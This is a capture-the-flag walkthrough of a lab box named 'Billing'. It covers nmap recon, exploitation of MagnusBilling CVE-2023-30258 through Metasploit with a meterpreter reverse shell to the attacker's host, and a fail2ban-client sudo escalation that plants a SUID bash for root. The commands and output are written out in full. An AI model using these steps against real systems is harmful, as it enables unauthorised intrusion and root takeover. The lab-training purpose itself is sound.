Billing

Some mistakes can be costly.

Recon

Our initial Nmap scan reveals four open ports, including a web server running on port 80, a MariaDB service on port 3306, and an Asterisk Call Manager on port 5038.

┌──(kali㉿kali)-[~]
└─$ nmap -p- billing.thm -T4              
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-01 11:14 IST
Nmap scan report for billing.thm (10.10.132.175)
Host is up (0.15s latency).
Not shown: 65527 closed tcp ports (conn-refused)
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
3306/tcp  open     mysql
5038/tcp  open     unknown

Nmap done: 1 IP address (1 host up) scanned in 768.78 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -sT -p 22,80,3306,5038 billing.thm -T4  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-01 11:23 IST
Nmap scan report for billing.thm (10.10.132.175)
Host is up (0.14s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 79:ba:5d:23:35:b2:f0:25:d7:53:5e:c5:b9:af:c0:cc (RSA)
|   256 4e:c3:34:af:00:b7:35:bc:9f:f5:b0:d2:aa:35:ae:34 (ECDSA)
|_  256 26:aa:17:e0:c8:2a:c9:d9:98:17:e4:8f:87:73:78:4d (ED25519)
80/tcp   open  http     Apache httpd 2.4.56 ((Debian))
| http-title:             MagnusBilling        
|_Requested resource was http://billing.thm/mbilling/
|_http-server-header: Apache/2.4.56 (Debian)
| http-robots.txt: 1 disallowed entry 
|_/mbilling/
3306/tcp open  mysql    MariaDB (unauthorized)
5038/tcp open  asterisk Asterisk Call Manager 2.10.6
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.43 seconds

The default script scan also reveals the contents of the robots.txt file, which includes a disallowed entry for the /mbilling directory.

| http-robots.txt: 1 disallowed entry 
|_/mbilling/

Upon visiting the directory, we are presented with a login page. Additionally, the title of the page displays the name MagnusBilling.

A quick search reveals that MagnusBilling is an open-source VoIP billing and management system. It is designed for managing SIP trunks, VoIP calls, and customer billing, offering tools for call routing, monitoring, and invoicing.

Initial Access

MagnusBilling is affected by an unauthenticated remote command execution vulnerability, identified as CVE-2023-30258. This vulnerability can be exploited manually, but it is also available as a module within the Metasploit Framework.

┌──(kali㉿kali)-[~]
└─$ msfconsole
Metasploit tip: The use command supports fuzzy searching to try and 
select the intended module, e.g. use kerberos/get_ticket or use 
kerberos forge silver ticket
                                                  
 _________________________________________________ 
< This console just got 20% cooler                >
 ------------------------------------------------- 
                                             /
                                            / 
 ▀▄▄▄▄▄▄▄▄                                 /  
   ▀▀▄▄▄▄▄█▄▄▄▄                           /   
   ▄███▄▄▄▄██▄██                         /    
 ▄██▄█▄▄█▄▄██▄███                       /     
 ▄██▄█████▄██▄▄█▄▄                     /      
▄███████▄██▄▀▀▄▄██                    /       
██████████▄▄▄ ██▄█                   /        
██▄███▄███ ▀▀ ████                  /         
▀███▄███▄▀     ███                 /          
 ▀ ████▄▀      █▄█                /           
   ██▄▀█     ▄▄▄▄▄▄▄▄            /            
   ▀▄█ ▀   ▄▄█▄██████▄▄         /             
    ▀█    ███▄█████████        /              
        ▄███▄▄█████████       /               
       ███████▄██████▄▀      /                
      █████▄▄█████████                        
    ▄▄███▄▀ █▄███████   ▄▄▄▄▄▄▄▄▄             
   ▄▄█████ ▄█▄██▄████▄█▄█▄▄██▄▄██▄█▀          
   ▀▄██▄▀▄▄▄███▄▄███▄██▄▄███▄▄███▄▄▄          
     ▀▀  ▄███████████████▄▄▄██▄▄███▀▄         
        ████▄█████████▄▄▄▄▄█▄▄▄▄▄███          
       ███████▄█████▄▄████▄▄██▄██▀▄██         
       ▀▀▄▄██████▄██████▄▄▄████▄▄  ▀▀▀        
        ▄▄██████████▄▄█▄▄▄▄▄██▄▄▄             
        ██▄█████████▄▄▄██████████             
        ▀▀ █▄████ ███▄█▄▄▄▄▄▄▄▀▀              
           ▄▄████  ████▄██                    
           ▀▄████   ██▄███                    
             ▀▄▄▀   ██▀█▀▀                    
                    â–ˆ                         


       =[ metasploit v6.3.60-dev                          ]
+ -- --=[ 2403 exploits - 1239 auxiliary - 422 post       ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search magnus

Matching Modules
================

   #  Name                                                        Disclosure Date  Rank       Check  Description
   -  ----                                                        ---------------  ----       -----  -----------
   0  exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258  2023-06-26       excellent  Yes    MagnusBilling application unauthenticated Remote Command Execution.


Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

msf6 > use 0
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > show options

Module options (exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /mbilling        yes       The MagnusBilling endpoint URL
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


   When TARGET is 0:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   WEBSHELL                   no        The name of the webshell with extension. Webshell name will be randomly generated if left unset.


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHP



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set LHOST 10.17.15.155
LHOST => 10.17.15.155
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set RHOSTS billing.thm
RHOSTS => billing.thm
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > run

The exploit succeeds, granting us a shell with the privileges of the asterisk user.

msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > run

[*] Started reverse TCP handler on 10.17.15.155:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 10.10.132.175:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 6 seconds.
[*] Elapsed time: 6.36 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 10.10.132.175
[+] Deleted yVTKmqbADnM.php
[*] Meterpreter session 1 opened (10.17.15.155:4444 -> 10.10.132.175:51064) at 2025-04-01 11:58:54 +0530

meterpreter > shell
Process 2542 created.
Channel 0 created.
id
uid=1001(asterisk) gid=1001(asterisk) groups=1001(asterisk)

While exploring the system, we find another user, magnus, listed in /etc/passwd. We have access to their home directory and successfully retrieve the user flag from there.

Privilege Escalation

As the asterisk user, we can run sudo -l without a password, revealing that we have permission to execute /usr/bin/fail2ban-client with root privileges.

Fail2Ban is a security tool that monitors log files for suspicious activity, blocking IP addresses after multiple failed login attempts. It helps prevent brute-force attacks by automatically applying firewall rules.

The following resource offers various techniques for leveraging Fail2Ban to escalate privileges, potentially allowing us to gain root access.

There's an approach where you can customize a config in the config directory and place code in it to be executed with root permissions. Unfortunately, we only have read-only access to the directory and its contents.

/etc/fail2ban

We can work around this limitation by copying the configuration directory and referencing it when executing fail2ban.

In the fail2ban-client command, the -c option allows us to specify the configuration directory for Fail2Ban.

sudo fail2ban-client -c /tmp/fail2ban/ -v restart

Using the command

rsync -av /etc/fail2ban/ /tmp/fail2ban/

we recursively copy the contents of /etc/fail2ban/ to /tmp/fail2ban/.

We can follow the Exploiting Fail2Ban and Getting a Root Shell section from Juggernaut Sec to customize action.d/iptables-multiport.conf and restart the service, or alternatively, create our own configuration.

In this case, we write a custom configuration that executes a script, which then copies /bin/bash to /tmp/bash and sets it as a SUID binary, allowing us to obtain a root shell.

rsync -av /etc/fail2ban/ /tmp/fail2ban/

cat > /tmp/script <<EOF
#!/bin/sh
cp /bin/bash /tmp/bash
chmod 755 /tmp/bash
chmod u+s /tmp/bash
EOF
chmod +x /tmp/script


cat > /tmp/fail2ban/action.d/custom-start-command.conf <<EOF
[Definition]
actionstart = /tmp/script
EOF

cat >> /tmp/fail2ban/jail.local <<EOF
[my-custom-jail]
enabled = true
action = custom-start-command
EOF

cat > /tmp/fail2ban/filter.d/my-custom-jail.conf <<EOF
[Definition]
EOF

sudo fail2ban-client -c /tmp/fail2ban/ -v restart

After running the script, we have a SUID binary located at /tmp/bash. By executing it with the -p parameter, we gain a root shell. From there, we find the root flag at /root/root.txt.

Last updated

Was this helpful?